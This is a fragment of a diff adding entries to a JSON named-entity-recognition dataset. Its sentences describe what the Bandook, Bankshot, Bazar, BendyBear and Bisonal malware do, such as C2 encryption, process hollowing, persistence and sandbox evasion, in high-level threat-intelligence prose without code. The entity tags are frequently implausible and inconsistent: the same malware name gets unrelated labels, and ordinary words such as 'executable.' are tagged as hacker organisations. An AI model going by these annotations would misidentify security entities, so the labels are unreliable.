+ "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + "the", + "ShellExecuteW()", + "function", + "call." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "a", + "command", + "built", + "in", + "to", + "use", + "a", + "raw", + "TCP", + "socket." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "detect", + "USB", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + "PowerShell", + "loaders", + "as", + "part", + "of", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "been", + "launched", + "by", + "starting", + "iexplore.exe", + "and", + "replacing", + "it", + "with", + "Bandook's", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "support", + "commands", + "to", + "execute", + "Python-based", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "is", + "capable", + "of", + "taking", + "an", + "image", + "of", + "and", + "uploading", + "the", + "current", + "desktop." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "is", + "delivered", + "via", + "a", + "malicious", + "Word", + "document", + "inside", + "a", + "zip", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + ".PNG", + "images", + "within", + "a", + "zip", + "file", + "to", + "build", + "the", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + "AES", + "encryption", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "collect", + "information", + "about", + "the", + "drives", + "available", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "a", + "command", + "to", + "get", + "the", + "public", + "IP", + "address", + "from", + "a", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "modules", + "that", + "are", + "capable", + "of", + "capturing", + "video", + "from", + "a", + "victim's", + "webcam." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + "malicious", + "VBA", + "code", + "against", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "is", + "capable", + "of", + "spawning", + "a", + "Windows", + "command", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "recursively", + "generates", + "a", + "list", + "of", + "files", + "within", + "a", + "directory", + "and", + "sends", + "them", + "back", + "to", + "the", + "control", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "grabs", + "a", + "user", + "token", + "using", + "WTSQueryUserToken", + "and", + "then", + "creates", + "a", + "process", + "by", + "impersonating", + "a", + "logged-on", + "user." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "collects", + "files", + "from", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "decodes", + "embedded", + "XOR", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "gathers", + "domain", + "and", + "account", + "names/information", + "through", + "process", + "monitoring." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "exfiltrates", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "leverages", + "a", + "known", + "zero-day", + "vulnerability", + "in", + "Adobe", + "Flash", + "to", + "execute", + "the", + "implant", + "into", + "the", + "victims’", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "marks", + "files", + "to", + "be", + "deleted", + "upon", + "the", + "next", + "system", + "reboot", + "and", + "uninstalls", + "and", + "removes", + "itself", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "searches", + "for", + "files", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "deletes", + "all", + "artifacts", + "associated", + "with", + "the", + "malware", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "uploads", + "files", + "and", + "secondary", + "payloads", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "gathers", + "domain", + "and", + "account", + "names/information", + "through", + "process", + "monitoring." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "writes", + "data", + "into", + "the", + "Registry", + "key", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bankshot", + "creates", + "processes", + "using", + "the", + "Windows", + "API", + "calls:", + "CreateProcessA()", + "and", + "CreateProcessAsUserA()." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bankshot", + "encodes", + "commands", + "from", + "the", + "control", + "server", + "using", + "a", + "range", + "of", + "characters", + "and", + "gzip." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "binds", + "and", + "listens", + "on", + "port", + "1058", + "for", + "HTTP", + "traffic", + "while", + "also", + "utilizing", + "a", + "FakeTLS", + "method." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "identifies", + "processes", + "and", + "collects", + "the", + "process", + "ids." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "generates", + "a", + "false", + "TLS", + "handshake", + "using", + "a", + "public", + "certificate", + "to", + "disguise", + "C2", + "network", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "searches", + "for", + "certain", + "Registry", + "keys", + "to", + "be", + "configured", + "before", + "executing", + "the", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "gathers", + "system", + "information,", + "network", + "addresses,", + "disk", + "type,", + "disk", + "free", + "space,", + "and", + "the", + "operation", + "system", + "version." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "modifies", + "the", + "time", + "of", + "a", + "file", + "as", + "specified", + "by", + "the", + "control", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "uses", + "HTTP", + "for", + "command", + "and", + "control", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "uses", + "the", + "command-line", + "interface", + "to", + "execute", + "arbitrary", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Bankshot", + "can", + "terminate", + "a", + "specific", + "process", + "by", + "its", + "process", + "id." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "TLS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "been", + "downloaded", + "via", + "Windows", + "BITS", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar's", + "loader", + "can", + "delete", + "scheduled", + "tasks", + "created", + "by", + "a", + "previous", + "instance", + "of", + "the", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "been", + "signed", + "with", + "fake", + "certificates", + "including", + "those", + "appearing", + "to", + "be", + "from", + "VB", + "CORPORATE", + "PTY.", + "LTD." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "retrieve", + "information", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "decrypt", + "downloaded", + "payloads.", + "Bazar", + "also", + "resolves", + "strings", + "and", + "other", + "artifacts", + "at", + "runtime." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "manually", + "loaded", + "ntdll", + "from", + "disk", + "in", + "order", + "to", + "identity", + "and", + "remove", + "API", + "hooks", + "set", + "by", + "security", + "products." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "the", + "ability", + "to", + "identify", + "domain", + "administrator", + "accounts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "implement", + "DGA", + "using", + "the", + "current", + "date", + "as", + "a", + "seed", + "variable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "Nltest", + "tools", + "to", + "obtain", + "information", + "about", + "the", + "domain." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Bazar", + "loader", + "has", + "used", + "dual-extension", + "executable", + "files", + "such", + "as", + "PreviewReport.DOC.exe." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "hash", + "then", + "resolve", + "API", + "calls", + "at", + "runtime." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "used", + "XOR,", + "RSA2,", + "and", + "RC4", + "encrypted", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "the", + "ability", + "to", + "use", + "an", + "alternative", + "C2", + "server", + "if", + "the", + "primary", + "server", + "fails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "delete", + "its", + "loader", + "using", + "a", + "batch", + "file", + "in", + "the", + "Windows", + "temporary", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "enumerate", + "the", + "victim's", + "desktop." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "download", + "and", + "deploy", + "additional", + "payloads,", + "including", + "ransomware", + "and", + "post-exploitation", + "frameworks", + "such", + "as", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "identify", + "administrator", + "accounts", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "gain", + "execution", + "after", + "a", + "user", + "clicks", + "on", + "a", + "malicious", + "link", + "to", + "decoy", + "landing", + "pages", + "hosted", + "on", + "Google", + "Docs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "create", + "a", + "task", + "named", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Bazar", + "loader", + "has", + "named", + "malicious", + "shortcuts", + "\"adobe\"", + "and", + "mimicked", + "communications", + "software." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Bazar", + "loader", + "is", + "used", + "to", + "download", + "and", + "execute", + "the", + "Bazar", + "backdoor." + ], + "ner_tags": [ + "O", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "various", + "APIs", + "to", + "allocate", + "memory", + "and", + "facilitate", + "code", + "execution/injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "enumerate", + "shared", + "drives", + "on", + "the", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "execute", + "a", + "PowerShell", + "script", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "identity", + "the", + "current", + "process", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "inject", + "into", + "a", + "target", + "process", + "using", + "process", + "doppelgänging." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "inject", + "into", + "a", + "target", + "process", + "including", + "Svchost,", + "Explorer,", + "and", + "cmd", + "using", + "process", + "hollowing." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "inject", + "code", + "through", + "calling", + "<code>VirtualAllocExNuma</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "query", + "<code>Windows\\CurrentVersion\\Uninstall</code>", + "for", + "installed", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "create", + "or", + "add", + "files", + "to", + "Registry", + "Run", + "Keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "enumerate", + "remote", + "systems", + "using", + "<code>", + "Net", + "View</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "create", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "identify", + "the", + "installed", + "antivirus", + "engine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "establish", + "persistence", + "by", + "writing", + "shortcuts", + "to", + "the", + "Windows", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "query", + "the", + "Registry", + "for", + "installed", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "a", + "variant", + "with", + "a", + "packed", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "has", + "been", + "spread", + "via", + "emails", + "with", + "embedded", + "malicious", + "links." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "send", + "C2", + "communications", + "with", + "XOR", + "encryption." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "fingerprint", + "architecture,", + "computer", + "name,", + "and", + "OS", + "version", + "on", + "the", + "compromised", + "host.", + "Bazar", + "can", + "also", + "check", + "if", + "the", + "Russian", + "language", + "is", + "installed", + "on", + "the", + "infected", + "machine", + "and", + "terminate", + "if", + "it", + "is", + "found." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "perform", + "a", + "check", + "to", + "ensure", + "that", + "the", + "operating", + "system's", + "keyboard", + "and", + "language", + "settings", + "are", + "not", + "set", + "to", + "Russian." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "collect", + "the", + "IP", + "address", + "and", + "NetBIOS", + "name", + "of", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "identify", + "the", + "username", + "of", + "the", + "infected", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "collect", + "the", + "time", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "a", + "timer", + "to", + "delay", + "execution", + "of", + "core", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "attempt", + "to", + "overload", + "sandbox", + "analysis", + "by", + "sending", + "1550", + "calls", + "to", + "<code>printf</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "over", + "ports", + "80", + "and", + "443", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "downloads", + "have", + "been", + "hosted", + "on", + "Google", + "Docs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "launch", + "cmd.exe", + "to", + "perform", + "reconnaissance", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "execute", + "a", + "WMI", + "query", + "to", + "gather", + "information", + "about", + "the", + "installed", + "antivirus", + "engine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bazar", + "can", + "use", + "Winlogon", + "Helper", + "DLL", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "has", + "decrypted", + "function", + "blocks", + "using", + "a", + "XOR", + "key", + "during", + "runtime", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "has", + "encrypted", + "payloads", + "using", + "RC4", + "and", + "XOR." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "BendyBear", + "is", + "designed", + "to", + "download", + "an", + "implant", + "from", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "has", + "used", + "byte", + "randomization", + "to", + "obscure", + "its", + "behavior." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "can", + "load", + "and", + "execute", + "modules", + "and", + "Windows", + "Application", + "Programming", + "(API)", + "calls", + "using", + "standard", + "shellcode", + "API", + "hashing." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "has", + "used", + "a", + "custom", + "RC4", + "and", + "XOR", + "encrypted", + "protocol", + "over", + "port", + "443", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "can", + "query", + "the", + "host's", + "Registry", + "key", + "at", + "<code>HKEY_CURRENT_USER\\Console\\QuickEdit</code>", + "to", + "retrieve", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "communicates", + "to", + "a", + "C2", + "server", + "over", + "port", + "443", + "using", + "modified", + "RC4", + "and", + "XOR-encrypted", + "chunks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "has", + "the", + "ability", + "to", + "determine", + "local", + "time", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BendyBear", + "can", + "check", + "for", + "analysis", + "environments", + "and", + "signs", + "of", + "debugging", + "using", + "the", + "Windows", + "API", + "<code>kernel32!GetTickCountKernel32</code>", + "call." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "been", + "loaded", + "through", + "a", + "`.wll`", + "extension", + "added", + "to", + "the", + "`", + "%APPDATA%\\microsoft\\word\\startup\\`", + "repository." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "appended", + "random", + "binary", + "data", + "to", + "the", + "end", + "of", + "itself", + "to", + "generate", + "a", + "large", + "binary." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "collected", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "decoded", + "strings", + "in", + "the", + "malware", + "using", + "XOR", + "and", + "RC4." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "a", + "dynamic", + "DNS", + "service", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, 